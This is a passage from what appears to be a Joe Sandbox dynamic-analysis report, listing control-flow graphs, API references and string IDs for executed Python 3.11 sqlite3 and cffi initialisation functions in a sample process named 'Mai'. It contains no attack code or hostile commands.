93798->93799 93799->93763 93800 7ffba47184f1 PyErr_NewException 93799->93800 93800->93763 93801 7ffba4718512 PyModule_AddType 93800->93801 93801->93763 93802 7ffba4718526 PyErr_NewException 93801->93802 93802->93763 93803 7ffba4718546 PyModule_AddType 93802->93803 93803->93763 93804 7ffba471855a PyErr_NewException 93803->93804 93804->93763 93805 7ffba471857b PyModule_AddType 93804->93805 93805->93763 93806 7ffba471858f PyUnicode_InternFromString 93805->93806 93806->93763 93807 7ffba47185a5 PyUnicode_InternFromString 93806->93807 93807->93763 93808 7ffba47185c2 PyUnicode_InternFromString 93807->93808 93808->93763 93809 7ffba47185df PyUnicode_InternFromString 93808->93809 93809->93763 93810 7ffba47185fc PyUnicode_InternFromString 93809->93810 93810->93763 93811 7ffba4718619 PyUnicode_InternFromString 93810->93811 93811->93763 93812 7ffba4718636 PyUnicode_InternFromString 93811->93812 93812->93763 93813 7ffba4718653 PyUnicode_InternFromString 93812->93813 93813->93763 93814 7ffba4718670 93813->93814 93828 7ffba4718980 PyModule_AddIntConstant 93814->93828 93816 7ffba471867f 93816->93763 93829 7ffba4718a5c 49 API calls 93816->93829 93818 7ffba471868f 93818->93763 93819 7ffba4718697 PyModule_AddStringConstant 93818->93819 93819->93763 93820 7ffba47186b6 sqlite3_libversion PyModule_AddStringConstant 93819->93820 93820->93763 93821 7ffba47186d3 sqlite3_threadsafe 93820->93821 93821->93771 93822->93762 93823->93767 93824->93770 93825->93774 93826->93777 93827->93780 93828->93816 93829->93818 93830->93771 93831->93771 93832->93771 93833 7ffba45b0180 GetSystemInfo 93834 7ffba45b01b4 93833->93834

                                                            Executed Functions

                                                            Function 00007FFBA4718268 Relevance: 121.0, APIs: 45, Strings: 24, Instructions: 299COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 286 7ffba4718268-7ffba4718280 sqlite3_libversion_number 287 7ffba471d416-7ffba471d41d 286->287 288 7ffba4718286-7ffba471828e sqlite3_initialize 286->288 289 7ffba471d42a-7ffba471d434 PyErr_SetString 287->289 290 7ffba471d41f-7ffba471d427 sqlite3_errstr 288->290 291 7ffba4718294-7ffba471829e call 7ffba4718744 288->291 292 7ffba471d43a 289->292 290->289 296 7ffba47182a4-7ffba47182ae call 7ffba471878c 291->296 297 7ffba4718736-7ffba471873d sqlite3_shutdown 291->297 295 7ffba471d442-7ffba471d445 292->295 298 7ffba471d461-7ffba471d467 295->298 299 7ffba471d447-7ffba471d45c PyErr_Format 295->299 296->297 304 7ffba47182b4-7ffba47182be call 7ffba47187d4 296->304 297->292 301 7ffba47186ec-7ffba47186fe PyModule_AddIntConstant 298->301 299->297 301->297 303 7ffba4718700-7ffba471870a call 7ffba47188ec 301->303 303->297 310 7ffba471870c-7ffba4718716 call 7ffba4718934 303->310 304->297 309 7ffba47182c4-7ffba47182ce call 7ffba4718818 304->309 309->297 315 7ffba47182d4-7ffba47182de call 7ffba4718860 309->315 310->297 316 7ffba4718718-7ffba4718722 call 7ffba47189f0 310->316 315->297 321 7ffba47182e4-7ffba47182ee call 7ffba47188a8 315->321 316->297 322 7ffba4718724-7ffba4718730 316->322 321->297 325 7ffba47182f4-7ffba471830f PyModule_GetState PyModule_AddType 321->325 325->297 326 7ffba4718315-7ffba4718324 PyModule_AddType 325->326 326->297 327 7ffba471832a-7ffba471833c PyModule_AddType 326->327 327->297 328 7ffba4718342-7ffba4718354 PyModule_AddType 327->328 328->297 329 7ffba471835a-7ffba471836c PyModule_AddType 328->329 329->297 330 7ffba4718372-7ffba4718393 PyErr_NewException 329->330 330->297 331 7ffba4718399-7ffba47183a7 PyModule_AddType 330->331 331->297 332 7ffba47183ad-7ffba47183ce PyErr_NewException 331->332 332->297 333 7ffba47183d4-7ffba47183e2 PyModule_AddType 332->333 333->297 334 7ffba47183e8-7ffba4718403 PyErr_NewException 333->334 334->297 335 7ffba4718409-7ffba4718417 PyModule_AddType 334->335 335->297 336 7ffba471841d-7ffba4718438 PyErr_NewException 335->336 336->297 337 7ffba471843e-7ffba471844c PyModule_AddType 336->337 337->297 338 7ffba4718452-7ffba471846d PyErr_NewException 337->338 338->297 339 7ffba4718473-7ffba4718481 PyModule_AddType 338->339 339->297 340 7ffba4718487-7ffba47184a2 PyErr_NewException 339->340 340->297 341 7ffba47184a8-7ffba47184b6 PyModule_AddType 340->341 341->297 342 7ffba47184bc-7ffba47184d7 PyErr_NewException 341->342 342->297 343 7ffba47184dd-7ffba47184eb PyModule_AddType 342->343 343->297 344 7ffba47184f1-7ffba471850c PyErr_NewException 343->344 344->297 345 7ffba4718512-7ffba4718520 PyModule_AddType 344->345 345->297 346 7ffba4718526-7ffba4718540 PyErr_NewException 345->346 346->297 347 7ffba4718546-7ffba4718554 PyModule_AddType 346->347 347->297 348 7ffba471855a-7ffba4718575 PyErr_NewException 347->348 348->297 349 7ffba471857b-7ffba4718589 PyModule_AddType 348->349 349->297 350 7ffba471858f-7ffba471859f PyUnicode_InternFromString 349->350 350->297 351 7ffba47185a5-7ffba47185bc PyUnicode_InternFromString 350->351 351->297 352 7ffba47185c2-7ffba47185d9 PyUnicode_InternFromString 351->352 352->297 353 7ffba47185df-7ffba47185f6 PyUnicode_InternFromString 352->353 353->297 354 7ffba47185fc-7ffba4718613 PyUnicode_InternFromString 353->354 354->297 355 7ffba4718619-7ffba4718630 PyUnicode_InternFromString 354->355 355->297 356 7ffba4718636-7ffba471864d PyUnicode_InternFromString 355->356 356->297 357 7ffba4718653-7ffba471866a PyUnicode_InternFromString 356->357 357->297 358 7ffba4718670-7ffba4718681 call 7ffba4718980 357->358 358->297 361 7ffba4718687-7ffba4718691 call 7ffba4718a5c 358->361 361->297 364 7ffba4718697-7ffba47186b0 PyModule_AddStringConstant 361->364 364->297 365 7ffba47186b6-7ffba47186d1 sqlite3_libversion PyModule_AddStringConstant 364->365 365->297 366 7ffba47186d3-7ffba47186dd sqlite3_threadsafe 365->366 367 7ffba47186df-7ffba47186e2 366->367 368 7ffba4718731-7ffba4718734 366->368 367->295 369 7ffba47186e8 367->369 368->301 369->301
                                                            APIs
                                                            • sqlite3_libversion_number.SQLITE3 ref: 00007FFBA4718275
                                                            • sqlite3_initialize.SQLITE3 ref: 00007FFBA4718286
                                                            • PyModule_GetState.PYTHON311 ref: 00007FFBA47182F7
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA4718307
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA471831C
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA4718334
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA471834C
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA4718364
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA4718386
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA471839F
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA47183C1
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA47183DA
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA47183F6
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA471840F
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA471842B
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA4718444
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA4718460
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA4718479
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA4718495
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA47184AE
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA47184CA
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA47184E3
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA47184FF
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA4718518
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA4718534
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA471854C
                                                            • PyErr_NewException.PYTHON311 ref: 00007FFBA4718568
                                                            • PyModule_AddType.PYTHON311 ref: 00007FFBA4718581
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA4718596
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA47185B3
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA47185D0
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA47185ED
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA471860A
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA4718627
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA4718644
                                                            • PyUnicode_InternFromString.PYTHON311 ref: 00007FFBA4718661
                                                              • Part of subcall function 00007FFBA4718980: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471867F), ref: 00007FFBA47189B8
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718A76
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718A94
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718AB0
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718ACC
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718AE8
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718B04
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718B20
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718B3C
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718B58
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718B74
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718B90
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718BAC
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718BC8
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718BE4
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718C00
                                                              • Part of subcall function 00007FFBA4718A5C: PyModule_AddIntConstant.PYTHON311(?,?,00000000,00007FFBA471868F), ref: 00007FFBA4718C1C
                                                            • PyModule_AddStringConstant.PYTHON311 ref: 00007FFBA47186A8
                                                            • sqlite3_libversion.SQLITE3 ref: 00007FFBA47186B6
                                                            • PyModule_AddStringConstant.PYTHON311 ref: 00007FFBA47186C9
                                                            • sqlite3_threadsafe.SQLITE3 ref: 00007FFBA47186D3
                                                            • PyModule_AddIntConstant.PYTHON311 ref: 00007FFBA47186F6
                                                            • sqlite3_shutdown.SQLITE3 ref: 00007FFBA4718736
                                                            • sqlite3_errstr.SQLITE3 ref: 00007FFBA471D421
                                                            • PyErr_SetString.PYTHON311 ref: 00007FFBA471D434
                                                            • PyErr_Format.PYTHON311 ref: 00007FFBA471D455
                                                              • Part of subcall function 00007FFBA4718744: PyType_FromModuleAndSpec.PYTHON311(?,?,?,00007FFBA471829C), ref: 00007FFBA471875B
                                                              • Part of subcall function 00007FFBA4718744: PyModule_GetState.PYTHON311(?,?,?,00007FFBA471829C), ref: 00007FFBA471876C
                                                              • Part of subcall function 00007FFBA471878C: PyType_FromModuleAndSpec.PYTHON311(?,?,?,00007FFBA47182AC), ref: 00007FFBA47187A3
                                                              • Part of subcall function 00007FFBA471878C: PyModule_GetState.PYTHON311(?,?,?,00007FFBA47182AC), ref: 00007FFBA47187B4
                                                              • Part of subcall function 00007FFBA47187D4: PyType_FromModuleAndSpec.PYTHON311(?,?,?,00007FFBA47182BC), ref: 00007FFBA47187EB
                                                              • Part of subcall function 00007FFBA47187D4: PyModule_GetState.PYTHON311(?,?,?,00007FFBA47182BC), ref: 00007FFBA47187FC
                                                              • Part of subcall function 00007FFBA4718818: PyType_FromModuleAndSpec.PYTHON311(?,?,?,00007FFBA47182CC), ref: 00007FFBA471882F
                                                              • Part of subcall function 00007FFBA4718818: PyModule_GetState.PYTHON311(?,?,?,00007FFBA47182CC), ref: 00007FFBA4718840
                                                              • Part of subcall function 00007FFBA4718860: PyType_FromModuleAndSpec.PYTHON311(?,?,?,00007FFBA47182DC), ref: 00007FFBA4718877
                                                              • Part of subcall function 00007FFBA4718860: PyModule_GetState.PYTHON311(?,?,?,00007FFBA47182DC), ref: 00007FFBA4718888
                                                              • Part of subcall function 00007FFBA47188A8: PyType_FromModuleAndSpec.PYTHON311(?,?,?,00007FFBA47182EC), ref: 00007FFBA47188BF
                                                              • Part of subcall function 00007FFBA47188A8: PyModule_GetState.PYTHON311(?,?,?,00007FFBA47182EC), ref: 00007FFBA47188D0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727923666.00007FFBA4711000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FFBA4710000, based on PE: true
                                                            • Associated: 00000004.00000002.2727861785.00007FFBA4710000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727988873.00007FFBA471E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                            • Associated: 00000004.00000002.2728054434.00007FFBA4728000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                            • Associated: 00000004.00000002.2728116429.00007FFBA472A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba4710000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Module_$Constant$Type$From$Err_$String$Exception$InternUnicode_$State$ModuleSpecType_$Formatsqlite3_errstrsqlite3_initializesqlite3_libversionsqlite3_libversion_numbersqlite3_shutdownsqlite3_threadsafe
                                                            • String ID: 2.6.0$Unable to interpret SQLite threadsafety mode. Got %d, expected 0, 1, or 2$__adapt__$__conform__$executescript$finalize$inverse$sqlite3.DataError$sqlite3.DatabaseError$sqlite3.Error$sqlite3.IntegrityError$sqlite3.InterfaceError$sqlite3.InternalError$sqlite3.NotSupportedError$sqlite3.OperationalError$sqlite3.ProgrammingError$sqlite3.Warning$sqlite3: SQLite 3.7.15 or higher required$sqlite_version$step$threadsafety$upper$value$version
                                                            • API String ID: 2988601926-849052780
                                                            • Opcode ID: adf0117df44379e2ba4d7d48fc6be53d3fe07d241cd24fa25d9c261ee665d1d4
                                                            • Instruction ID: e806ed535334056c98039d3a976df59315b2f18ac61ee680a86823cd49a0ee3c
                                                            • Opcode Fuzzy Hash: adf0117df44379e2ba4d7d48fc6be53d3fe07d241cd24fa25d9c261ee665d1d4
                                                            • Instruction Fuzzy Hash: F0D1D0A4B0BA83C2FA569F7AE9D4275A394BF46B80B855436CD0E57270EF2CF0148301
                                                            Function 00007FFBA4860960 Relevance: 165.5, APIs: 93, Strings: 1, Instructions: 1023COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PyImport_Import.PYTHON311(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBA4858789), ref: 00007FFBA4860980
                                                            • _Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBA4858789), ref: 00007FFBA48609A9
                                                            • _Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBA4858789), ref: 00007FFBA48609EF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2728951566.00007FFBA4851000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FFBA4850000, based on PE: true
                                                            • Associated: 00000004.00000002.2728888781.00007FFBA4850000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                            • Associated: 00000004.00000002.2729020085.00007FFBA4863000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                            • Associated: 00000004.00000002.2729135476.00007FFBA4869000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                            • Associated: 00000004.00000002.2729204761.00007FFBA486D000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba4850000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Dealloc$ImportImport_
                                                            • String ID: <module>
                                                            • API String ID: 2397823689-217463007
                                                            • Opcode ID: d2be1aa01b1dbe8b3e4e64f86c6d658d020e4521edc391cf9bceee43f547c085
                                                            • Instruction ID: 9c2c374a9a133cffd1de0c6e10ea451a2ef07f3fd53b028f45a2a32a038b49a7
                                                            • Opcode Fuzzy Hash: d2be1aa01b1dbe8b3e4e64f86c6d658d020e4521edc391cf9bceee43f547c085
                                                            • Instruction Fuzzy Hash: BCB2E1E5A0BA86C1EA939B79F8D4178B3A1BF49B85F4440BACD0E07775EF3CA4558301
                                                            Function 00007FFBA4568C80 Relevance: 52.7, APIs: 20, Strings: 10, Instructions: 180libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 370 7ffba4568c80-7ffba4568ccc 371 7ffba4568cd2-7ffba4568cdd 370->371 372 7ffba4568f2b-7ffba4568f42 _PyArg_ParseTuple_SizeT 370->372 371->372 375 7ffba4568ce3-7ffba4568cf1 371->375 373 7ffba4568f69 372->373 374 7ffba4568f44-7ffba4568f4f 372->374 379 7ffba4568f6b-7ffba4568f90 call 7ffba457add0 373->379 376 7ffba4568f52-7ffba4568f63 PyErr_SetString 374->376 377 7ffba4568e8f-7ffba4568ea9 _PyArg_ParseTuple_SizeT 375->377 378 7ffba4568cf7-7ffba4568d01 375->378 376->373 377->373 382 7ffba4568eaf-7ffba4568ebf 377->382 378->377 380 7ffba4568d07-7ffba4568d11 378->380 380->377 385 7ffba4568d17-7ffba4568d21 380->385 383 7ffba4568ee1-7ffba4568ee8 382->383 384 7ffba4568ec1-7ffba4568edc PyErr_Format 382->384 387 7ffba4568eea-7ffba4568f01 PyErr_Format 383->387 388 7ffba4568f03-7ffba4568f23 PyUnicode_FromFormat PyUnicode_AsUTF8 383->388 384->373 385->377 389 7ffba4568d27-7ffba4568d31 385->389 387->373 390 7ffba4568f26-7ffba4568f29 388->390 389->377 391 7ffba4568d37-7ffba4568d51 _PyArg_ParseTuple_SizeT 389->391 390->379 392 7ffba4568dd0-7ffba4568dff PyErr_Clear _PyArg_ParseTuple_SizeT 391->392 393 7ffba4568d53-7ffba4568d62 PyUnicode_AsUTF8 391->393 392->373 394 7ffba4568e05-7ffba4568e18 PyUnicode_AsUTF8 392->394 393->373 395 7ffba4568d68-7ffba4568d85 PyUnicode_GetLength 393->395 396 7ffba4568e1a-7ffba4568e20 PyMem_Free 394->396 397 7ffba4568e25-7ffba4568e28 394->397 398 7ffba4568d91-7ffba4568db8 call 7ffba457af80 PyUnicode_AsWideChar 395->398 399 7ffba4568d87 395->399 396->373 397->376 401 7ffba4568e2e-7ffba4568e3b LoadLibraryA PyMem_Free 397->401 398->373 404 7ffba4568dbe-7ffba4568dce LoadLibraryW 398->404 399->398 403 7ffba4568e41-7ffba4568e44 401->403 403->390 405 7ffba4568e4a-7ffba4568e52 GetLastError 403->405 404->403 406 7ffba4568e6d-7ffba4568e8a PyErr_Format 405->406 407 7ffba4568e54-7ffba4568e68 call 7ffba45611a0 405->407 406->373 407->406
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727176190.00007FFBA4561000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFBA4560000, based on PE: true
                                                            • Associated: 00000004.00000002.2727111159.00007FFBA4560000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727243281.00007FFBA457C000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727309418.00007FFBA4589000.00000004.00000001.01000000.00000024.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727381495.00007FFBA458F000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba4560000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Unicode_$Err_$Arg_FormatParseSizeTuple_$FreeLibraryLoadMem_$CharClearErrorFromLastLengthStringWide
                                                            • String ID: <None>$O|i:load_library$U|i:load_library$cannot call dlopen(NULL)$cannot load library '%s': %s$dlopen() takes a file name or 'void *' handle, not '%s'$dlopen(None) not supported on Windows$error 0x%x$et|i:load_library$|Oi:load_library
                                                            • API String ID: 563250132-880521189
                                                            • Opcode ID: ee60774dc3b9627a478c1097a96f2330d9506e9b6672ac25e4a7f3879058a169
                                                            • Instruction ID: 72df937c69c192af0a60ad016565deb52980fb8f1aab031e909bfa59d12259bb
                                                            • Opcode Fuzzy Hash: ee60774dc3b9627a478c1097a96f2330d9506e9b6672ac25e4a7f3879058a169
                                                            • Instruction Fuzzy Hash: 209106A1A1BB42D5EB56CF76E8941B863A1FF45B94B480936ED0E476B4DF3CE588C300
                                                            Function 00007FFBA48545F0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 118COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2728951566.00007FFBA4851000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FFBA4850000, based on PE: true
                                                            • Associated: 00000004.00000002.2728888781.00007FFBA4850000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                            • Associated: 00000004.00000002.2729020085.00007FFBA4863000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                            • Associated: 00000004.00000002.2729135476.00007FFBA4869000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                            • Associated: 00000004.00000002.2729204761.00007FFBA486D000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba4850000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Dealloc$ItemObject_$Err_FormatFromImportObjectUnicode_$AttrClearDict_ErrorFilenameImport_LevelModuleModule_
                                                            • String ID: %U.%U$cannot import name %R from %R (%S)
                                                            • API String ID: 3630264407-438398067
                                                            • Opcode ID: ece2ea5a91f1dd057eb8d64435eaa5ff92b98033e2d5e2640f04719924da41ce
                                                            • Instruction ID: 47c12805357f0c8585d2ee342e8e6a2903936168b291a38dc7a580a179e4fb38
                                                            • Opcode Fuzzy Hash: ece2ea5a91f1dd057eb8d64435eaa5ff92b98033e2d5e2640f04719924da41ce
                                                            • Instruction Fuzzy Hash: C44180A5A0AA86D1EB569F76F884279A7A0FB49FD5F148074CE4D07764EF3CE0058701
                                                            Function 00007FFBA48586B0 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 137COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 434 7ffba48586b0-7ffba48586c8 435 7ffba48586d8-7ffba48586f4 PyModule_Create2 434->435 436 7ffba48586ca-7ffba48586d7 434->436 437 7ffba48587d0-7ffba48587d3 435->437 438 7ffba48586fa-7ffba4858724 PyObject_GetAttrString PyModule_GetDict 435->438 439 7ffba48587e4-7ffba48587ee 437->439 440 7ffba48587d5-7ffba48587d9 437->440 441 7ffba48587ae-7ffba48587b8 438->441 442 7ffba485872a-7ffba4858730 438->442 447 7ffba48587f0-7ffba48587fb 439->447 448 7ffba4858803-7ffba485880d 439->448 440->439 444 7ffba48587db-7ffba48587de _Py_Dealloc 440->444 441->437 443 7ffba48587ba-7ffba48587c5 441->443 445 7ffba4858732-7ffba4858778 call 7ffba4854180 442->445 446 7ffba4858784 call 7ffba4860960 442->446 443->437 453 7ffba48587c7-7ffba48587ca _Py_Dealloc 443->453 444->439 445->441 460 7ffba485877a 445->460 457 7ffba4858789-7ffba485878b 446->457 447->448 449 7ffba48587fd _Py_Dealloc 447->449 450 7ffba485880f-7ffba485881a 448->450 451 7ffba4858822-7ffba485882c 448->451 449->448 450->451 456 7ffba485881c _Py_Dealloc 450->456 458 7ffba4858841-7ffba485884b 451->458 459 7ffba485882e-7ffba4858839 451->459 453->437 456->451 457->441 461 7ffba485878d-7ffba4858791 457->461 463 7ffba4858860-7ffba485886a 458->463 464 7ffba485884d-7ffba4858858 458->464 459->458 462 7ffba485883b _Py_Dealloc 459->462 460->446 465 7ffba485879c-7ffba48587ad 461->465 466 7ffba4858793-7ffba4858796 _Py_Dealloc 461->466 462->458 468 7ffba485887f-7ffba4858889 463->468 469 7ffba485886c-7ffba4858877 463->469 464->463 467 7ffba485885a _Py_Dealloc 464->467 466->465 467->463 471 7ffba485888b-7ffba4858896 468->471 472 7ffba485889e-7ffba48588a8 468->472 469->468 470 7ffba4858879 _Py_Dealloc 469->470 470->468 471->472 475 7ffba4858898 _Py_Dealloc 471->475 473 7ffba48588bd-7ffba48588c7 472->473 474 7ffba48588aa-7ffba48588b5 472->474 477 7ffba48588dc-7ffba48588e6 473->477 478 7ffba48588c9-7ffba48588d4 473->478 474->473 476 7ffba48588b7 _Py_Dealloc 474->476 475->472 476->473 480 7ffba48588fb-7ffba4858907 477->480 481 7ffba48588e8-7ffba48588f3 477->481 478->477 479 7ffba48588d6 _Py_Dealloc 478->479 479->477 481->480 482 7ffba48588f5 _Py_Dealloc 481->482 482->480
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2728951566.00007FFBA4851000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FFBA4850000, based on PE: true
                                                            • Associated: 00000004.00000002.2728888781.00007FFBA4850000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                            • Associated: 00000004.00000002.2729020085.00007FFBA4863000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                            • Associated: 00000004.00000002.2729135476.00007FFBA4869000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                            • Associated: 00000004.00000002.2729204761.00007FFBA486D000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba4850000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Module_$AttrCreate2DeallocDictObject_String
                                                            • String ID: __name__
                                                            • API String ID: 2272293537-3954359393
                                                            • Opcode ID: 541929ddcf8c491025d374671fea7ea31b8098b9d163f129cf1293189f4a4869
                                                            • Instruction ID: 63599251be4874cbe69bf0a543fa520997c02e35033b71bbc47845a9b4d9e530
                                                            • Opcode Fuzzy Hash: 541929ddcf8c491025d374671fea7ea31b8098b9d163f129cf1293189f4a4869
                                                            • Instruction Fuzzy Hash: 0861ACB5E0BA86C1FAA78B75F8D4134B3E4AF48B95F0880B6CD4E02774DF3DA4609641
                                                            Function 00007FFBA4568FA0 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727176190.00007FFBA4561000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFBA4560000, based on PE: true
                                                            • Associated: 00000004.00000002.2727111159.00007FFBA4560000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727243281.00007FFBA457C000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727309418.00007FFBA4589000.00000004.00000001.01000000.00000024.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727381495.00007FFBA458F000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba4560000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Unicode_$Library$Arg_CharDeallocErr_ErrorFormatFreeLastLengthLoadObject_ParseSizeTuple_Wide_strdup
                                                            • String ID:
                                                            • API String ID: 2014377733-0
                                                            • Opcode ID: 12d0421d3cd385fbe76f906549a688ad5a16b824a8a22540682aa9ddaff4b47a
                                                            • Instruction ID: 68e04727000a8049ce2e5a3ea047440185391372f11b17bbe35127af54265082
                                                            • Opcode Fuzzy Hash: 12d0421d3cd385fbe76f906549a688ad5a16b824a8a22540682aa9ddaff4b47a
                                                            • Instruction Fuzzy Hash: 920140B6A1BB41C2EA168F75E480179B3A0FF88BA4B480435DE4D42768EF7CD544C740
                                                            Function 00007FFBA4568850 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 493 7ffba4568850-7ffba4568860 494 7ffba4568862-7ffba4568866 493->494 495 7ffba456886e-7ffba4568880 free PyObject_Free 493->495 494->495 496 7ffba4568868 FreeLibrary 494->496 496->495
                                                            APIs
